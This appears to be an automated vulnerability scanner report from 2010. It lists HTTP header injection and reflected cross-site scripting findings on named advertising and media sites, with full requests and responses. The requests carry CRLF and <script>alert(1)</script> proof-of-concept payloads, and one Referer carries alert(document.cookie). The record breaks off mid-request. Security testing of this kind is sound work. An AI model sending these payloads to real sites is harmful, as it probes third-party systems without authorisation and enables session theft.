Cookie: U=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; A2=ekNy9Ytg0aPa0000820wsiff3a9Ytg03sY0000820wsifHY+9YcR07Hs0000820wshfgbE9YhW02WG0000820wshfUzq9Yf80bfZ0000o61wshf.ae9YeI06IX0000g410shg8.K9YtA06OJ0000820wsif.bD9YeI06IX0000820wsh; eyeblaster=BWVal=246&BWDate=40527.720093&debuglevel=&FLV=10.1103&RES=128&WMPV=056b52%0d%0ad5a67d15b17; F1=00UilH0003sY9QVZ; B2=71cT0820wsi7W4s0820wsi7I0D0820wsh7Qiy0820wsh6UT.0820wsi7Qiz0g410sh7CEh0o61wsh72xf0820wsh; u2=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; E2=07Hso61wsh0aPag210si084oE210sf09KD820wrZ08Y5g410s3066Ng20wsg0bcF820wse0aVX820wsd02Edw620sd07A8820wse0bFAm5xosh08wQu7xUse077Tg20wr+07RTg410sf03sYSJHqsi0abMm5xos507fto20ws502WGSIbqsh04gITybush09EZ820ws305meg410sf06IXPEbesh0apK820wrU0bfZo61wsh0bKdo41wsf04m4820wsg06+TnBVush07k1820wse05sM820wsc0bnAME2ysf06OJ820wsi09bwg210s9; C3=0uju820wsh0000200_0ugY820wsi0000004_0tUC820wsi0000080_0wt6820wsi000000w_0v51820wsh0000002_0vBTo61wsh000000g_0tyOo61wsh0001000_; u3=1; ActivityInfo=000nx2bhf%5f000nx5bhf%5f0008uqbhL%5f000g3dbdR%5f000jUQbis%5f000nx1bhf%5f; D3=0ugY00Mm820wsi0wt603tW820wsi0tUC00Mm820wsi0v51004H820wsh0tyO04UKo61wsh0vBT04UKo61wsh0uju00iZ820wsh;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=246&BWDate=40527.720093&debuglevel=&FLV=10.1103&RES=128&WMPV=056b52
d5a67d15b17
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
Connection: close


1.2. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload ff369%0d%0a82c1db4eb16 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; A2=ekNy9Ytg0aPa0000820wsiff3a9Ytg03sY0000820wsifHY+9YcR07Hs0000820wshfgbE9YhW02WG0000820wshfUzq9Yf80bfZ0000o61wshf.ae9YeI06IX0000g410shg8.K9YtA06OJ0000820wsif.bD9YeI06IX0000820wsh; eyeblaster=BWVal=246&BWDate=40527.720093&debuglevel=&FLV=10.1103&RES=128&WMPV=0ff369%0d%0a82c1db4eb16; F1=00UilH0003sY9QVZ; B2=71cT0820wsi7W4s0820wsi7I0D0820wsh7Qiy0820wsh6UT.0820wsi7Qiz0g410sh7CEh0o61wsh72xf0820wsh; u2=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; E2=07Hso61wsh0aPag210si084oE210sf09KD820wrZ08Y5g410s3066Ng20wsg0bcF820wse0aVX820wsd02Edw620sd07A8820wse0bFAm5xosh08wQu7xUse077Tg20wr+07RTg410sf03sYSJHqsi0abMm5xos507fto20ws502WGSIbqsh04gITybush09EZ820ws305meg410sf06IXPEbesh0apK820wrU0bfZo61wsh0bKdo41wsf04m4820wsg06+TnBVush07k1820wse05sM820wsc0bnAME2ysf06OJ820wsi09bwg210s9; C3=0uju820wsh0000200_0ugY820wsi0000004_0tUC820wsi0000080_0wt6820wsi000000w_0v51820wsh0000002_0vBTo61wsh000000g_0tyOo61wsh0001000_; u3=1; ActivityInfo=000nx2bhf%5f000nx5bhf%5f0008uqbhL%5f000g3dbdR%5f000jUQbis%5f000nx1bhf%5f; D3=0ugY00Mm820wsi0wt603tW820wsi0tUC00Mm820wsi0v51004H820wsh0tyO04UKo61wsh0vBT04UKo61wsh0uju00iZ820wsh;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: u2=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=246&BWDate=40527.720093&debuglevel=&FLV=10.1103&RES=128&WMPV=0ff369
82c1db4eb16
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 16 Dec 2010 15:00:10 GMT
Connection: close


1.3. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b1cfe%0d%0a385bd7a08a7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jaw/b1cfe%0d%0a385bd7a08a7/10/51087634/ HTTP/1.1
Host: www.accelacomm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3;

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 14:07:06 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=b1cfe
385bd7a08a7
&Source_BC=10&Script=/LP/51087634/reg&
Vary: Accept-Encoding
Content-Length: 429
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.4. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b8f4d%0d%0a75caad6ec0d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/b8f4d%0d%0a75caad6ec0d/51087634/ HTTP/1.1
Host: www.accelacomm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3;

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 14:07:09 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=00019830002630CION8PY4MR9KO__ciost_ppw&Source_BC=b8f4d
75caad6ec0d
&Script=/LP/51087634/reg&
Vary: Accept-Encoding
Content-Length: 465
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.5. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 8aeeb%0d%0a72b7a6572e9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/8aeeb%0d%0a72b7a6572e9/ HTTP/1.1
Host: www.accelacomm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3;

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 14:07:13 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=00019830002630CION8PY4MR9KO__ciost_ppw&Source_BC=10&Script=/LP/8aeeb
72b7a6572e9
/reg&
Vary: Accept-Encoding
Content-Length: 459
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.6. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_160/1/51217035/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 84af3%0d%0a1ba961655d8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jaw/84af3%0d%0a1ba961655d8/1/51217035/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:02 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=84af3
1ba961655d8
&Source_BC=1&Script=/LP/51217035/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 428

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.7. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_160/1/51217035/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 40b6a%0d%0acae5fdcb550 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /jaw/btob_smm_160/40b6a%0d%0acae5fdcb550/51217035/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:05 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_160&Source_BC=40b6a
cae5fdcb550
&Script=/LP/51217035/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 439

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.8. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_160/1/51217035/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 6060f%0d%0af949928b296 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jaw/btob_smm_160/1/6060f%0d%0af949928b296/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:07 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_160&Source_BC=1&Script=/LP/6060f
f949928b296
/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 432

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.9. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_728/1/51217035/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bd5a3%0d%0a512870eaac9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jaw/bd5a3%0d%0a512870eaac9/1/51217035/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://www.btobonline.com/section/blog-roundup
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:00 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=bd5a3
512870eaac9
&Source_BC=1&Script=/LP/51217035/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 428

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.10. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_728/1/51217035/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 555c7%0d%0a14034e98e3e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /jaw/btob_smm_728/555c7%0d%0a14034e98e3e/51217035/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://www.btobonline.com/section/blog-roundup
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:02 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_728&Source_BC=555c7
14034e98e3e
&Script=/LP/51217035/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 439

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.11. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_728/1/51217035/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload dae2d%0d%0a5e4e4802f7 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jaw/btob_smm_728/1/dae2d%0d%0a5e4e4802f7/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://www.btobonline.com/section/blog-roundup
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:05 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_728&Source_BC=1&Script=/LP/dae2d
5e4e4802f7
/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 431

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.12. http://www.accelacomm.com/jef/51217035/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jef/51217035/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b6f72%0d%0a5c2db68553b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jef/b6f72%0d%0a5c2db68553b/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://www.accelacommunications.com/index2/lp/evolve_video_strategy.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Svr=svr.regwa3; regid=57c7f943:12cec784a11:-3759.92

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:02 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=EMBED&Script=/LP/b6f72
5c2db68553b
/reg&/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 390

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2. Cross-site scripting (reflected)
There are 437 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain, and user input should be HTML-encoded at any point where it is copied into application responses. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 75089<script>alert(1)</script>444453bafa7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adam-services/api/media75089<script>alert(1)</script>444453bafa7/getVideo?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4481
Date: Thu, 16 Dec 2010 13:59:18 GMT

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[/media75089<script>alert(1)</script>444453bafa7/getVideo] is not a valid API call!","stackTrace":[{"className":"com.aol.global.util.WebApiServlet","methodName":"doGetOrPost","fileName":"WebApiServlet.java","lineNumber":82},{"className":"com.aol.glo
...[SNIP]...

2.2. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53df9<script>alert(1)</script>d5a0bd145b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adam-services/api/media/getVideo53df9<script>alert(1)</script>d5a0bd145b1?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4481
Date: Thu, 16 Dec 2010 13:59:19 GMT

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[/media/getVideo53df9<script>alert(1)</script>d5a0bd145b1] is not a valid API call!","stackTrace":[{"className":"com.aol.global.util.WebApiServlet","methodName":"doGetOrPost","fileName":"WebApiServlet.java","lineNumber":82},{"className":"com.aol.global.util.
...[SNIP]...

2.3. http://adam-service.app.aol.com/adam-services/api/media/getVideo [brightcoveId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of the brightcoveId request parameter is copied into the HTML document as plain text between tags. The payload b297a<script>alert(1)</script>bee90c4c596 was submitted in the brightcoveId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adam-services/api/media/getVideo?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId=b297a<script>alert(1)</script>bee90c4c596 HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Date: Thu, 16 Dec 2010 13:59:09 GMT
Content-Length: 11066

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"Cannot convert [brightcoveId] parameter with values of [b297a<script>alert(1)</script>bee90c4c596] to [long] type!","stackTrace":[{"className":"com.aol.global.util.WebPageContext","methodName":"getParameter","fileName":"WebPageContext.java","lineNumber":330},{"className":"com.aol.global.util.WebPa
...[SNIP]...

2.4. http://adam-service.app.aol.com/adam-services/api/media/getVideo [version parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of the version request parameter is copied into the HTML document as plain text between tags. The payload c2853<script>alert(1)</script>82d0c915ecc was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adam-services/api/media/getVideo?version=1.0c2853<script>alert(1)</script>82d0c915ecc&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4710
Date: Thu, 16 Dec 2010 13:58:59 GMT

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[1.0c2853<script>alert(1)</script>82d0c915ecc] is not a valid version string!","stackTrace":[{"className":"com.aol.global.util.Version","methodName":"<init>
...[SNIP]...

2.5. http://adserver.adtech.de/ [adiframe|2.0|277|75593|1|246|target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /

Issue detail

The value of the adiframe|2.0|277|75593|1|246|target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9f878><script>alert(1)</script>1985d9d85ae was submitted in the adiframe|2.0|277|75593|1|246|target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?adiframe|2.0|277|75593|1|246|target=9f878><script>alert(1)</script>1985d9d85ae HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
